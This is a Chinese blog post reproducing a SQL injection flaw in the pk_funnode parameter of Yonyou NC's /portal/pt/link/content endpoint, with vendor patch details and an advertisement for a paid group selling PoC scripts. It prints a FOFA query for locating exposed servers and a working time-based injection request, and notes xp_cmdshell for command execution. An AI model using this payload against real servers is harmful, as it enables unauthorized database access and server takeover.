首页 > 数据库 >「漏洞复现」用友NC link/content SQL注入漏洞

「漏洞复现」用友NC link/content SQL注入漏洞

时间:2024-09-02 20:55:52浏览次数:15  
标签:NC 补丁 content 漏洞 funnode SQL 星球

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。这一系列产品基于全球最新的互联网技术、云计算技术和移动应用技术,旨在帮助企业创新管理模式、引领商业变革。

0x03 漏洞威胁

用友NC /portal/pt/link/content 接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

影响范围:

NC63、NC633、NC65

0x04 漏洞环境

FOFA:

icon_hash="1085941792"

0x05 漏洞复现

PoC

GET /portal/pt/link/content?pageId=login&pk_funnode=1'waitfor+delay+'0:0:4'-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

延时

0x06 批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

打对应补丁,重启服务,各版本补丁获取方式如下:

NC63方案

补丁名称:patch_portal63_content的pk_funnode参数存在SQL注入

补丁编码:NCM_NC6.3_000_109902_20240730_GP_317884194

校验码:

cd810380dbe1f0edb9d38416cf281ae450bd712f68747d70aed275789906b584

NC633方案

补丁名称:patch_portal633_content的pk_funnode参数存在SQL注入

补丁编码:NCM_NC6.33_000_109902_20240730_GP_317913093

校验码:

b828176d84f554899e6ef073c66ee6b28ca3ca38bb6d446e09f2f029d7e05e05

NC65方案

补丁名称:patch_portal65_content的pk_funnode参数存在SQL注入

补丁编码:NCM_NC6.5_000_109902_20240730_GP_317934889

校验码:

be3fa16f1a6a73b9eb71b5d5f52c9c1d9202be18c4c00cdac36c7b2df3989d3a

0x08 加入我们

漏洞详情及批量检测POC工具请前往知识星球获取

知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等

「星球介绍」:

本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。

本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。

本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。

「星球服务」:

加入星球,你会获得:

♦ 批量验证漏洞POC脚本

♦ 0day、1day分享

♦ 汇集其它付费星球资源分享

♦ 大量的红蓝对抗实战资源

♦ 优秀的内部红蓝工具及插件

♦ 综合类别优秀Wiki文库及漏洞库

♦ 提问及技术交流

标签:NC,补丁,content,漏洞,funnode,SQL,星球
From: https://blog.csdn.net/qq_39894062/article/details/141746012

相关文章

  • 《深度学习》OpenCV 图像边缘检测 算法解析及代码演示
    目录一、图像边缘检测1、什么是边缘检测2、常用的边缘检测算法        1)Sobel算子    2)Scharr算子        3)Canny边缘检测算法        4)Laplacian算子3、边缘检测流程        1)预处理        2)计算梯度     ......
  • java并发 第四章共享模型之管程 3 synchronized 原理
    1.轻量级锁轻量级锁的使用场景:如果一个对象虽然有多线程要加锁,但加锁的时间是错开的(也就是没有竞争),那么可以使用轻量级锁来优化。轻量级锁对使用者是透明的,即语法仍然是synchronized假设有两个方法同步块,利用同一个对象加锁 staticfinalObjectobj=newObject();......
  • 【甲方安全建设】富文本编辑器XSS漏洞攻击及防御详析
    原创文章,禁止转载。目录调研背景搭建TinyMCE富文本编辑器靶场富文本编辑器前端过滤富文本编辑器后端攻击后端弱过滤弱过滤1弱过滤2后端有效过滤从甲方的视角看动态安全调研背景随着Web2.0技术的普及,富文本编辑器在各种Web应用中得到了广泛应用,用户、网站管理员等可以通过富......
  • 【OpenCV】快速入门(二)--视频处理(1)
    OpenCV–视频处理先看代码#include<iostream>#include"opencv2/highgui/highgui.hpp"#include"opencv2/imgproc/imgproc.hpp"intmain(intargc,char**argv){cv::namedWindow("Example3",cv::WINDOW_AUTOSIZE);cv::VideoCaptu......
  • 开机就能打?没那么玄乎!客观分析 “狂躁许可”漏洞(CVE-2024-38077)及其影响范围
    一、事件背景2024年7月9日,微软官方发布了一个针对“windows远程桌面授权服务远程代码执行漏洞”(CVE-2024-38077)的修复补丁包,起初并没有引起大家的警觉。今日在国外某网站上疑似漏洞的作者公开了该漏洞的“POC验证代码”。一时激起千层浪,该漏洞开始疯狂发酵并在安全圈里转发。该文章......
  • 【学习】【AI+安全】基于AI的业务逻辑漏洞安全架构研究
    摘要引言一、业务逻辑漏洞的挑战二、AI技术与业务逻辑漏洞检测2.1自然语言分析2.2模式识别与异常检测三、架构设计3.1架构模块设计3.2架构模型设计3.2.1基础场景分析模型3.2.2一致性分析模型3.2.3异常分析模型......
  • Syncfusion Essential Studio 26.2.4
    SyncfusionEssentialStudioisacompletesuitewith1,800+UIcomponentsandframeworksthatcanbeusedforallyourdesktop,web,andmobileapplicationdevelopmentneeds.EssentialStudioconsistsof.NETlibrariesandUIcontrolsthatprovidecomplet......
  • java中的synchronized
    介绍Java中的synchronized关键字是一种内置的同步机制,用于实现线程之间的互斥,以确保多个线程在同一时刻只能有一个线程访问特定的代码段或对象。synchronized可以用于方法或代码块,从而实现对共享资源的安全访问。前言需要明确的是,锁是针对对象而言的,以下场景实际上都是在描述外......
  • OpenCV(cv::getTickCount()、cv::getTickFrequency())
    目录1.getTickCount()2.getTickFrequency()3.综合应用4.注意事项getTickCount()和getTickFrequency()是OpenCV库中的两个函数,通常用于获取高精度的时间间隔。这两个函数主要用于计时和性能测量。1.getTickCount()getTickCount()函数用于返回从系统启动到当前为......